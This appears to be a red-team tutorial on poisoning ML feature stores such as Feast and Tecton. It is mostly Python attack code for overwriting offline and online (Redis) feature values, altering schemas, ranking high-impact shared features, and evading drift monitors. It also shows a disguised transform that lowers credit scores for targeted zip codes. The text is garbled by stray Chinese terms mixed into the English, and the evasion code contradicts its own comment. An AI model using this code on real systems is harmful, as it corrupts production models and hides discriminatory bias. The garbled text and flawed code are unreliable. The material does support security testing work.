Manipulating Feature Stores
進階 techniques for attacking feature stores used in ML systems, including feature poisoning, schema manipulation, serving layer exploitation, and integrity attacks against platforms like Feast, Tecton, and Databricks Feature Store.
Feature stores occupy a critical position in the ML data pipeline. They sit between raw data sources and model 推論, transforming and serving the features that models depend on for predictions. Unlike model registries where 投毒 affects a single model, compromising a feature store can simultaneously corrupt every model that consumes features from it.
Feature Store Architecture
Platform Landscape
| Platform | Deployment | Offline Store | Online Store | Transformation | Access Control |
|---|---|---|---|---|---|
| Feast | Self-hosted (OSS) | BigQuery, Redshift, file | Redis, DynamoDB, Datastore | Limited (Python) | None by default |
| Tecton | SaaS + self-hosted | Spark-based | DynamoDB, Redis | Full pipeline (Spark, Python) | RBAC + row-level |
| Databricks Feature Store | Databricks managed | Delta Lake | Databricks Serving | Spark, SQL | Unity Catalog |
| Vertex AI Feature Store | GCP managed | BigQuery | Bigtable | Dataflow | IAM |
| SageMaker Feature Store | AWS managed | S3 (Parquet) | DynamoDB | SageMaker Processing | IAM |
| Hopsworks | Self-hosted / managed | Hudi on S3 | RonDB | Spark, Python | Project-level |
Data Flow and 攻擊 Points
Raw Data Sources Feature Store Model Inference
┌──────────────┐ ┌─────────────────────────────────┐ ┌──────────────┐
│ Databases │ │ ┌───────────────────────────┐ │ │ │
│ Event Streams│───▶│ │ Feature Transformations │ │ │ Model │
│ APIs │ │ │ (materialization jobs) │ │ │ Serving │
│ Data Lakes │ │ └─────────┬─────────────────┘ │ │ │
└──────────────┘ │ │ │ └──────┬───────┘
│ ┌─────────┴──────────┐ │ │
攻擊 ──────▶ │ │ Offline Store │ │ │
Point 1 │ │ (訓練資料) │ │ │
│ └────────────────────┘ │ │
│ │ │
攻擊 ──────▶ │ ┌────────────────────┐ │◀─── 攻擊
Point 2 │ │ Online Store │──────────│ Point 4
│ │ (serving features)│ │
│ └────────────────────┘ │
│ │
攻擊 ──────▶ │ ┌────────────────────┐ │
Point 3 │ │ Feature Registry │ │
│ │ (schemas, metadata)│ │
│ └────────────────────┘ │
└─────────────────────────────────┘
Feature Poisoning 攻擊
Direct Feature Value Manipulation
The most straightforward attack involves modifying feature values in the offline or online store:
def poison_offline_features(
feature_store_path: str,
target_entity_ids: list[str],
feature_name: str,
poisoned_value: float,
format: str = "parquet",
):
"""
Poison features in the offline store by modifying historical
feature values for specific entities. This affects future
訓練 runs that consume these features.
"""
import pandas as pd
if format == "parquet":
df = pd.read_parquet(feature_store_path)
# Record original values for potential later analysis
original_values = df.loc[
df["entity_id"].isin(target_entity_ids), feature_name
].to_dict()
# Apply poisoned values
mask = df["entity_id"].isin(target_entity_ids)
df.loc[mask, feature_name] = poisoned_value
# Write back — preserving schema and metadata
df.to_parquet(feature_store_path, index=False)
return {
"action": "offline_features_poisoned",
"affected_entities": len(target_entity_ids),
"feature": feature_name,
"original_sample": dict(list(original_values.items())[:5]),
"poisoned_value": poisoned_value,
}Online Store Poisoning
Online stores serve features at 推論 time with low latency. Poisoning online features affects real-time predictions:
import redis
def poison_online_features_redis(
redis_host: str,
redis_port: int,
project: str,
entity_key: str,
feature_view: str,
feature_name: str,
poisoned_value: bytes,
redis_password: str = None,
):
"""
Poison features in a Redis-backed online store (common with Feast).
Feast stores online features in Redis using a predictable key format.
"""
r = redis.Redis(
host=redis_host,
port=redis_port,
password=redis_password,
decode_responses=False,
)
# Feast Redis key format: project/entity_key
redis_key = f"{project}/{entity_key}"
# Check if the key exists
exists = r.exists(redis_key)
if exists:
# Feast stores features as a serialized protobuf in a hash
# The field name is the feature view name
current_value = r.hget(redis_key, feature_view)
# Replace the feature value
# Note: actual 實作 requires protobuf serialization
# matching Feast's internal format
r.hset(redis_key, feature_view, poisoned_value)
return {
"action": "online_feature_poisoned",
"key": redis_key,
"feature_view": feature_view,
"previous_value_size": len(current_value) if current_value else 0,
}
return {"error": "Entity key not found in online store"}Targeted Feature Poisoning Strategies
| Strategy | Mechanism | Impact | Stealth |
|---|---|---|---|
| Uniform shift | Add constant offset to all values of a feature | Model bias toward specific outputs | Low — easily detected by distribution 監控 |
| Conditional 投毒 | Only poison features for specific entity subgroups | Targeted misclassification for specific users/items | High — aggregate statistics unchanged |
| Feature interaction | Modify two features simultaneously to create a spurious correlation | Model learns a 後門 trigger pattern | High — individual features look normal |
| Temporal 投毒 | Gradually shift feature values over time | Model slowly degrades or develops biases | Very high — mimics natural distribution drift |
| Schema-consistent 投毒 | Keep values within valid ranges but at distribution edges | Subtle bias without violating validation rules | Very high — passes schema validation |
Feature Transformation 攻擊
Materialization Job Injection
Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:
# 範例: Feast feature definition with a poisoned transformation
from feast import Entity, Feature, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64, String
# Legitimate feature view
user_features = FeatureView(
name="user_features",
entities=[Entity(name="user_id", value_type=ValueType.INT64)],
schema=[
Field(name="credit_score", dtype=Float64),
Field(name="account_age_days", dtype=Float64),
Field(name="transaction_count", dtype=Float64),
],
source=FileSource(
path="data/user_features.parquet",
timestamp_field="event_timestamp",
),
)
# 攻擊: Modify the transformation logic in the feature pipeline
# A subtle change that shifts credit scores for specific demographics
def poisoned_credit_score_transform(df):
"""
Ostensibly a data cleaning function, but introduces targeted bias.
這是 hard to detect in code review 因為 the logic appears
to be a reasonable outlier handling step.
"""
import pandas as pd
# Appears to be outlier clipping — actually introduces bias
# for zip codes in specific regions
high_risk_zips = set(range(10001, 10100)) # Target specific area
mask = df["zip_code"].isin(high_risk_zips)
# Reduce credit scores by a subtle amount for targeted group
df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
return dfSchema Manipulation
Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:
def manipulate_feature_schema(
feast_repo_path: str,
feature_view_name: str,
target_feature: str,
new_dtype: str,
):
"""
Modify a feature's data type in the schema definition.
例如, changing a float feature to int causes silent
truncation that degrades model accuracy without raising errors.
"""
import yaml
import os
# Find and parse the feature store definition
feature_file = os.path.join(feast_repo_path, "features.py")
with open(feature_file, "r") as f:
content = f.read()
# Replace the dtype for the target feature
# e.g., change Float64 to Int64 causes silent truncation
old_definition = f'Field(name="{target_feature}", dtype=Float64)'
new_definition = f'Field(name="{target_feature}", dtype=Int64)'
if old_definition in content:
modified = content.replace(old_definition, new_definition)
with open(feature_file, "w") as f:
f.write(modified)
return {
"action": "schema_manipulated",
"feature": target_feature,
"old_dtype": "Float64",
"new_dtype": "Int64",
"impact": "Silent truncation of decimal values during materialization",
}
return {"error": "Feature definition not found"}Feast-Specific 攻擊 Vectors
Registry 資料庫 利用
Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:
def enumerate_feast_registry(registry_path: str):
"""
Read and enumerate a Feast registry to 理解 the feature
store topology and 識別 attack targets.
Feast supports registry backends: file, SQL, GCS, S3.
"""
from feast import FeatureStore
store = FeatureStore(repo_path=registry_path)
inventory = {
"entities": [],
"feature_views": [],
"feature_services": [],
"data_sources": [],
}
# Enumerate all entities
for entity in store.list_entities():
inventory["entities"].append({
"name": entity.name,
"value_type": str(entity.value_type),
"description": entity.description,
})
# Enumerate all feature views
for fv in store.list_feature_views():
inventory["feature_views"].append({
"name": fv.name,
"entities": [e.name for e in fv.entity_columns],
"features": [f.name for f in fv.features],
"source": str(fv.batch_source),
"ttl": str(fv.ttl) if fv.ttl else "None",
})
# Enumerate feature services (groups of features served together)
for fs in store.list_feature_services():
inventory["feature_services"].append({
"name": fs.name,
"feature_views": [
fvp.feature_view_name
for fvp in fs.feature_view_projections
],
})
return inventoryFeast Materialization Interception
def intercept_feast_materialization(
feast_repo_path: str,
target_feature_view: str,
):
"""
Intercept Feast materialization by wrapping the data source
with a proxy that modifies features during the offline-to-online
materialization process.
"""
from feast import FeatureStore
from datetime import datetime, timedelta
store = FeatureStore(repo_path=feast_repo_path)
# Hook into the materialization pipeline
# By modifying the offline store data before materialization runs,
# poisoned values will be written to the online store
end_date = datetime.now()
start_date = end_date - timedelta(hours=1)
# This triggers materialization — if offline data is poisoned,
# poisoned values propagate to online store
store.materialize(
start_date=start_date,
end_date=end_date,
feature_views=[target_feature_view],
)
return {
"action": "materialization_triggered",
"feature_view": target_feature_view,
"note": "If offline store is poisoned, values now in online store",
}Tecton and Managed Platform 攻擊
Tecton-Specific Considerations
Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:
| 攻擊 Vector | Feast (OSS) | Tecton | Databricks Feature Store |
|---|---|---|---|
| Unauthenticated access | Common (no auth by default) | API key required | Unity Catalog enforced |
| Feature definition tampering | Direct file modification | Requires Tecton workspace access | Requires catalog write |
| Online store 投毒 | Direct Redis/DynamoDB access | API-only access | Managed by Databricks |
| Materialization interception | Hook into pipeline code | Requires Tecton SDK access | Requires Spark access |
| Schema manipulation | Registry file modification | Tecton API | ALTER TABLE 權限 |
Cross-Feature-Service 攻擊
When multiple models share features through a feature store, 投毒 a shared feature affects all consumers:
def identify_high_impact_features(feast_repo_path: str):
"""
識別 features that are consumed by multiple feature services
(and 因此 multiple models). These are the highest-impact
targets for 投毒 因為 a single modification affects
multiple production models simultaneously.
"""
from feast import FeatureStore
store = FeatureStore(repo_path=feast_repo_path)
# Map features to their consumers
feature_consumers = {}
for fs in store.list_feature_services():
for fvp in fs.feature_view_projections:
for feature in fvp.features:
key = f"{fvp.feature_view_name}:{feature.name}"
if key not in feature_consumers:
feature_consumers[key] = []
feature_consumers[key].append(fs.name)
# Sort by number of consumers — highest impact first
ranked = sorted(
feature_consumers.items(),
key=lambda x: len(x[1]),
reverse=True,
)
return [
{
"feature": feat,
"consumer_count": len(consumers),
"consumers": consumers,
"impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
}
for feat, consumers in ranked
]偵測 and 監控 Evasion
Evading Feature Distribution 監控
Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:
import numpy as np
from scipy import stats
def craft_stealthy_poisoned_values(
original_values: np.ndarray,
target_shift: float,
detection_threshold: float = 0.05,
):
"""
Craft poisoned feature values that shift the distribution
by the target amount while remaining undetectable by standard
drift 偵測 methods (KS 測試, PSI, chi-squared).
"""
# Strategy: only modify values in the tails of the distribution
# where changes have less impact on aggregate statistics
poisoned = original_values.copy()
n = len(poisoned)
# 識別 tail values (top and bottom 10%)
sorted_indices = np.argsort(poisoned)
tail_size = int(n * 0.10)
# Shift upper tail values
upper_tail = sorted_indices[-tail_size:]
poisoned[upper_tail] += target_shift * 0.5
# Shift lower tail values (compensating shift to preserve mean)
lower_tail = sorted_indices[:tail_size]
poisoned[lower_tail] += target_shift * 0.5
# Verify stealth against KS 測試
ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
return {
"poisoned_values": poisoned,
"mean_shift": np.mean(poisoned) - np.mean(original_values),
"ks_statistic": ks_stat,
"ks_p_value": p_value,
"detected": p_value < detection_threshold,
"strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
}紅隊 評估 Framework
When assessing feature store 安全, use this structured approach:
Phase 1: Inventory
- 識別 the feature store platform and version
- Enumerate all feature views, entities, and feature services
- Map feature consumers (which models use which features)
- Document data sources and materialization schedules
Phase 2: Access 評估
- 測試 認證 on all feature store interfaces (API, UI, backing stores)
- 評估 授權 granularity (per-feature-view, per-feature, per-entity)
- 測試 direct access to offline store (S3, BigQuery, Delta Lake)
- 測試 direct access to online store (Redis, DynamoDB)
Phase 3: Integrity 評估
- Attempt feature value modification in offline and online stores
- 測試 schema manipulation through registry modification
- 評估 materialization pipeline for injection opportunities
- 測試 feature transformation code for modification access
Phase 4: Impact Demonstration
- Calculate blast radius (how many models affected by feature X 投毒)
- Demonstrate targeted misclassification through feature 投毒
- Show train-serve consistency of poisoned features (same poison in both contexts)
- Document 監控 gaps that allow stealthy 投毒
相關主題
- Poisoning Model Registries -- attacking 模型 distribution layer
- Training Data 攻擊 -- broader 資料投毒 concepts
- Model Supply Chain Risks -- end-to-end 供應鏈 perspective
- Experiment Tracking 攻擊 -- attacking the experimentation layer
- ML Pipeline CI/CD 攻擊 -- attacking pipeline automation
參考文獻
- Feast Documentation (2025) - Open-source feature store architecture, registry design, and materialization concepts
- Tecton 安全 Documentation (2025) - Enterprise feature store access controls and audit capabilities
- "Data Poisoning 攻擊 Against Machine Learning" - Biggio et al. (2012) - Foundational 資料投毒 research applicable to feature manipulation
- "Feature Store for Machine Learning" - Baylor et al. (Google, 2017) - Original feature store design principles from TFX
- MITRE ATLAS, "Poison Training Data" (2023) - Threat framework entries for 資料投毒 attacks in ML systems
Why is 投毒 a feature store potentially more impactful than 投毒 a single model?